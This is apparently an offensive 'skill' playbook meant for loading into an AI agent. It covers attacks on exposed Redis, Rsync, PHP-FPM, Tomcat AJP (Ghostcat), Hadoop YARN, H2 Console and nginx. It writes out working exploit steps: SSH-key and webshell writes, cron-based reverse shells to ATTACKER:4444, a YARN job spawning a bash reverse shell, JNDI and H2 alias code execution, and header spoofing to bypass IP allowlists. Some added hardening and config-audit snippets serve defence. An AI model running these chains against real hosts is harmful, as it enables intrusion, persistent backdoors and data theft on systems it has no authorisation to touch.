unauthorized-access-common-services

# SKILL: Unauthorized Access to Common Services — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert techniques for exploiting unauthenticated or weakly authenticated management services. Covers Redis write-to-RCE, Rsync data theft, PHP-FPM code execution, Ghostcat AJP file read, Hadoop YARN job submission, and H2 Console JNDI. These are infrastructure-level findings distinct from web application vulnerabilities.
## 0. RELATED ROUTING

- ssrf-server-side-request-forgery when these services are reachable via SSRF (e.g., SSRF → Redis)
- jndi-injection when H2 Console or similar accepts JNDI connection strings
- deserialization-insecure when RMI Registry or T3 protocol is exposed
## 1. DISCOVERY — PORT SCANNING

```bash
nmap -sV -p 6379,873,9000,8009,8088,8082,1099,9200,5984,2375,27017,11211 TARGET
```

Key ports:

- 6379 — Redis
- 873 — Rsync
- 9000 — PHP-FPM (FastCGI)
- 8009 — AJP (Tomcat Ghostcat)
- 8088 — Hadoop YARN ResourceManager
- 8082 — H2 Console (or embedded in Spring Boot)
- 1099 — Java RMI Registry
- 9200 — Elasticsearch
- 5984 — CouchDB
- 2375 — Docker API
- 27017 — MongoDB
- 11211 — Memcached
---

## 2. REDIS (PORT 6379)

### Detection

```bash
redis-cli -h TARGET ping
# Response: PONG = unauthenticated access confirmed

redis-cli -h TARGET INFO server
# Returns Redis version, OS, config
```
### Write SSH Authorized Keys

```bash
# Generate key pair:
ssh-keygen -t rsa -f redis_rsa

# Write public key to Redis, then dump to authorized_keys:
redis-cli -h TARGET flushall
cat redis_rsa.pub | redis-cli -h TARGET -x set ssh_key
redis-cli -h TARGET config set dir /root/.ssh
redis-cli -h TARGET config set dbfilename authorized_keys
redis-cli -h TARGET save

# Connect:
ssh -i redis_rsa root@TARGET
```
### Write Crontab (Reverse Shell)

```bash
redis-cli -h TARGET
> set x "\n\n*/1 * * * * bash -i >& /dev/tcp/ATTACKER/4444 0>&1\n\n"
> config set dir /var/spool/cron/
> config set dbfilename root
> save
```

### Write Webshell

```bash
redis-cli -h TARGET
> set webshell "<?php system($_GET['cmd']); ?>"
> config set dir /var/www/html/
> config set dbfilename shell.php
> save
```

### Master-Slave Replication RCE

Use `redis-rogue-server.so` to exploit master-slave replication for loading a malicious module:

```bash
python3 redis-rogue-server.py --rhost TARGET --lhost ATTACKER
```

Loads module via SLAVEOF → MODULE LOAD → system.exec
### Hardening

```conf
requirepass STRONG_PASSWORD
bind 127.0.0.1
protected-mode yes
rename-command CONFIG ""
rename-command FLUSHALL ""
```
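A redis.conf audit for the hardening above, added here as an example and not part of the original playbook: it parses the file and flags the settings this section relies on, and it goes one step further by also requiring SLAVEOF/REPLICAOF/MODULE to be disabled, since those are what the replication RCE chain needs. Both config fragments are constructed.

```python
import re

# Constructed redis.conf fragments (not from any real host).
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
# requirepass deliberately left unset
"""
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
requirepass STRONG_PASSWORD
rename-command CONFIG ""
rename-command FLUSHALL ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
"""
# CONFIG/FLUSHALL drive the file-write chains above; SLAVEOF/REPLICAOF/MODULE
# drive the rogue-master module load. Renaming a command to "" disables it.
DANGEROUS_COMMANDS = ("CONFIG", "FLUSHALL", "SLAVEOF", "REPLICAOF", "MODULE")

def parse_conf(text):
    """Return (directives, renamed_commands) from redis.conf text, comments dropped."""
    directives, renamed = {}, {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(" ")
        if key.lower() == "rename-command":
            m = re.match(r'(\S+)\s+"?(.*?)"?$', value.strip())
            if m:
                renamed[m.group(1).upper()] = m.group(2)
        else:
            directives[key.lower()] = value.strip()
    return directives, renamed

def audit_redis_conf(text):
    """Return a list of findings; an empty list means every check passed."""
    d, renamed = parse_conf(text)
    findings = []
    if not d.get("requirepass"):
        findings.append("no requirepass: unauthenticated access")
    bind = d.get("bind", "")
    if not bind or "0.0.0.0" in bind or "*" in bind or "::" in bind.split():
        findings.append("bind not restricted to loopback")
    if d.get("protected-mode", "yes").lower() != "yes":
        findings.append("protected-mode disabled")
    for cmd in DANGEROUS_COMMANDS:
        if renamed.get(cmd) != "":
            findings.append(f"{cmd} not disabled via rename-command")
    return findings
```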
---

## 3. RSYNC (PORT 873)
### Detection

```bash
rsync TARGET::
# Lists available modules (shares) if anonymous access allowed

rsync -av TARGET::MODULE_NAME /tmp/loot/
# Download entire module contents
```
### Exploitation — Write Crontab

```bash
# Create reverse shell cron:
echo '*/1 * * * * bash -i >& /dev/tcp/ATTACKER/4444 0>&1' > /tmp/evil_cron

# Upload to target's crontab (if writable module maps to /etc/ or similar):
rsync -av /tmp/evil_cron TARGET::MODULE/cron.d/backdoor
```
### Hardening

/etc/rsyncd.conf:

```conf
auth users = rsync_user
secrets file = /etc/rsyncd.secrets
list = no
hosts allow = 10.0.0.0/8
read only = yes
```
---

## 4. PHP-FPM / FASTCGI (PORT 9000)

### Mechanism

PHP-FPM listens for FastCGI requests. If exposed to the network (instead of a Unix socket), an attacker can send crafted FastCGI packets to execute arbitrary PHP code.
### Exploitation

```bash
# Using fcgi_exp or similar tool:
python3 fpm.py TARGET 9000 /var/www/html/index.php -c "<?php system('id'); ?>"

# Key parameters in FastCGI request:
# SCRIPT_FILENAME = path to any existing .php file
# PHP_VALUE = "auto_prepend_file = php://input" (injects POST body as PHP code)
# PHP_ADMIN_VALUE = "allow_url_include = On"
```

### Key FastCGI Environment Variables for Exploitation

```text
SCRIPT_FILENAME = /var/www/html/index.php   # must point to an existing .php file
PHP_VALUE = auto_prepend_file = php://input  # injects POST body as PHP code
PHP_ADMIN_VALUE = allow_url_include = On     # enables remote inclusion
```

### Via SSRF (gopher)

```text
gopher://TARGET:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00...
# Encoded FastCGI packet
```

Tool: Gopherus generates the gopher:// URL

```bash
python3 gopherus.py --exploit fastcgi
```
### Hardening

```ini
; php-fpm.conf — bind to socket only:
listen = /var/run/php-fpm.sock
; If TCP required, restrict:
listen.allowed_clients = 127.0.0.1
```

---

## 5. GHOSTCAT — AJP (PORT 8009) — CVE-2020-1938
### Mechanism

Apache JServ Protocol (AJP) is used between a reverse proxy and Tomcat. AJP trusts all incoming data — an attacker connecting directly can set `javax.servlet.include.request_uri` to read arbitrary files from the webapp directory.

### File Read
```bash
# Using ajpShooter or similar:
python3 ajpShooter.py TARGET 8009 /WEB-INF/web.xml read

# Reads any file within the webapp root:
# /WEB-INF/web.xml — deployment descriptor
# /WEB-INF/classes/*.class — compiled Java classes
# /WEB-INF/lib/*.jar — library JARs
```
### File Include → RCE

If a file upload exists (e.g., uploaded JSP disguised as image), AJP can include it as JSP:

```bash
python3 ajpShooter.py TARGET 8009 /uploaded_avatar.txt eval
# If the file contains JSP code, it gets executed
```
### Hardening

```xml
<!-- server.xml — disable AJP or add secret: -->
<Connector port="8009" protocol="AJP/1.3" secretRequired="true" secret="STRONG_SECRET"/>
<!-- Or remove the AJP connector entirely -->
```
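A server.xml check for the hardening above, added as an example and not part of the original playbook: it walks every AJP connector and reports the ones that lack a secret, disable secretRequired, or are not bound to loopback. The server.xml is constructed.

```python
import xml.etree.ElementTree as ET

# Constructed server.xml (not from any real host): one AJP connector left as
# Ghostcat expects it, one hardened as the snippet above shows.
SERVER_XML = """
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
    <Connector port="8010" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="STRONG_SECRET"/>
  </Service>
</Server>
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

def audit_ajp_connectors(xml_text):
    """Return {port: [findings]} for every AJP connector in a Tomcat server.xml."""
    report = {}
    for conn in ET.fromstring(xml_text).iter("Connector"):
        if not conn.get("protocol", "HTTP/1.1").upper().startswith("AJP"):
            continue
        findings = []
        # Fixed Tomcat releases default secretRequired to true; an explicit
        # "false" re-opens the connector to unauthenticated AJP clients.
        if conn.get("secretRequired", "true").lower() != "true":
            findings.append("secretRequired disabled")
        if not conn.get("secret"):
            findings.append("no AJP secret configured")
        # A missing address attribute binds all interfaces on unfixed releases.
        if conn.get("address", "") not in LOOPBACK:
            findings.append("AJP listener not restricted to loopback")
        report[conn.get("port", "?")] = findings
    return report
```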
---

## 6. HADOOP YARN RESOURCEMANAGER (PORT 8088)

### Detection

```bash
curl http://TARGET:8088/cluster
# If accessible → unauthenticated YARN ResourceManager UI
```
### RCE via Application Submission

```bash
# Submit a MapReduce application that executes a command:
curl -s -X POST http://TARGET:8088/ws/v1/cluster/apps/new-application
# Returns: {"application-id":"application_xxx_0001"}

curl -s -X POST http://TARGET:8088/ws/v1/cluster/apps \
  -H "Content-Type: application/json" \
  -d '{ "application-id": "application_xxx_0001", "application-name": "test", "am-container-spec": { "commands": {"command": "/bin/bash -i >& /dev/tcp/ATTACKER/4444 0>&1"} }, "application-type": "YARN" }'
```
### Hardening

Enable Kerberos authentication; restrict network access to management ports.

## 7. H2 DATABASE CONSOLE
### Detection

H2 Console is often enabled in Spring Boot apps via:

```properties
spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true
```

Access:

```text
http://TARGET:PORT/h2-console
```

### JNDI Injection via Connection String
In the H2 Console login form, the JDBC URL field accepts JNDI.

BeanFactory + EL bypass (works on Java 8u252+):

```text
JDBC URL in login form:
javax.naming.InitialContext

LDAP response attributes:
javaClassName: javax.el.ELProcessor
javaFactory: org.apache.naming.factory.BeanFactory
forceString: x=eval
x: Runtime.getRuntime().exec("id")
```

Also see [jndi-injection](../jndi-injection/SKILL.md) for the full JNDI/BeanFactory exploitation flow.

### RCE via RUNSCRIPT
```sql
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd); return "ok"; }';
CALL EXEC('id');
```

## 8. QUICK REFERENCE
```text
Redis — check auth:
redis-cli -h TARGET ping

Redis — write webshell:
SET x "<?php system($_GET['c']);?>"
CONFIG SET dir /var/www/html/
CONFIG SET dbfilename shell.php
SAVE

Rsync — list modules:
rsync TARGET::

Ghostcat — read web.xml:
python3 ajpShooter.py TARGET 8009 /WEB-INF/web.xml read

YARN — submit RCE job:

H2 — RCE via alias:
CREATE ALIAS EXEC AS '...Runtime.exec...'; CALL EXEC('id');
```

---

## 9. REVERSE PROXY MISCONFIGURATION
### Nginx Off-By-Slash Path Traversal

```nginx
# Vulnerable configuration:
location /static {
    alias /var/www/static/;
}
# Access: /static../etc/passwd → resolves to /var/www/etc/passwd
# The missing trailing slash on location causes path traversal
# Fix: location /static/ (with trailing slash matching alias)
```
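A small config auditor for the off-by-slash pattern above, added as an example and not part of the original playbook: it pairs each prefix `location` with its `alias` and flags the combinations where the location lacks the trailing slash, and `resolve()` reproduces the prefix-strip-and-append mapping that turns `/static../etc/passwd` into `/var/www/etc/passwd`. The nginx fragment is constructed.

```python
import posixpath
import re

# Constructed nginx.conf fragment (not from any real host): the first location
# is the vulnerable pattern above, the second is the fixed form, the third has
# no alias at all.
NGINX_CONF = """
server {
    listen 80;
    location /static {
        alias /var/www/static/;
    }
    location /static-fixed/ {
        alias /var/www/static/;
    }
    location /api {
        proxy_pass http://backend;
    }
}
"""

LOCATION_RE = re.compile(r'location\s+(?:(=|~\*?|\^~)\s+)?(\S+)\s*\{([^}]*)\}')
ALIAS_RE = re.compile(r'\balias\s+([^;]+);')

def find_off_by_slash(conf):
    """Return [(location_prefix, alias_path)] for each vulnerable pair."""
    hits = []
    for m in LOCATION_RE.finditer(conf):
        modifier, prefix, body = m.groups()
        if modifier in ("=", "~", "~*"):   # exact/regex locations are not prefix matches
            continue
        alias = ALIAS_RE.search(body)
        if not alias:
            continue
        path = alias.group(1).strip()
        if not prefix.endswith("/") and path.endswith("/"):
            hits.append((prefix, path))
    return hits

def resolve(prefix, alias, uri):
    """Mimic how nginx maps a URI under a prefix location with alias: the
    matched prefix is cut off and the remainder is appended to the alias."""
    if not uri.startswith(prefix):
        return None
    return posixpath.normpath(alias + uri[len(prefix):])
```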
### Nginx Missing Root Location

```nginx
# If no root location defined and alias is used:
# Attacker may access nginx.conf or other server files
# GET /..%2f..%2fetc/nginx/nginx.conf HTTP/1.1
```
### X-Forwarded-For / X-Real-IP Trust

If backend trusts these headers for IP-based auth:

```http
GET /admin HTTP/1.1
X-Forwarded-For: 127.0.0.1
X-Real-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
```

May bypass IP whitelist for admin panels
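How a backend should derive the client address so the spoofed headers above do not reach an IP allowlist, added as an example and not part of the original playbook: headers are only honoured when the TCP peer is a known proxy, and even then the chain is walked from the proxy-appended end. The proxy and allowlist ranges are constructed.

```python
import ipaddress

# Constructed network layout (not from any real deployment): only the reverse
# proxies in TRUSTED_PROXIES may vouch for a client address.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]
ADMIN_ALLOWLIST = [ipaddress.ip_network("127.0.0.1/32"),
                   ipaddress.ip_network("192.168.10.0/24")]

def _is_trusted_proxy(ip):
    return any(ip in net for net in TRUSTED_PROXIES)

def client_ip(peer_addr, headers):
    """Resolve the client address without trusting attacker-controlled headers.

    A direct (non-proxy) peer is taken at face value and its headers are
    ignored, so the spoofed request above resolves to the attacker's own
    address.  Behind a trusted proxy the X-Forwarded-For chain is walked from
    the right (values our proxies appended) to the left (values the client
    sent) and the first hop that is not a trusted proxy is the client.
    X-Real-IP and True-Client-IP are never consulted.
    """
    peer = ipaddress.ip_address(peer_addr)
    if not _is_trusted_proxy(peer):
        return peer
    chain = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(chain):
        try:
            ip = ipaddress.ip_address(hop)
        except ValueError:
            return peer   # malformed hop: fall back to the proxy's own address
        if not _is_trusted_proxy(ip):
            return ip
    return peer

def admin_allowed(peer_addr, headers):
    """IP allowlist check for /admin built on client_ip()."""
    ip = client_ip(peer_addr, headers)
    return any(ip in net for net in ADMIN_ALLOWLIST)
```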
### Caddy Template Injection

Caddy with templates enabled: if user input reaches Caddy template rendering:

```text
{{.Req.Host}} → Information disclosure
{{readFile "/etc/passwd"}} → Local file read via Go template
```

This is essentially a Go template injection through proxy config
### Useful Tools

- yandex/gixy — Nginx configuration analyzer
- Raelize/Kyubi — Reverse proxy misconfiguration scanner
- GerbenJavado/bypass-url-parser — URL parser confusion tester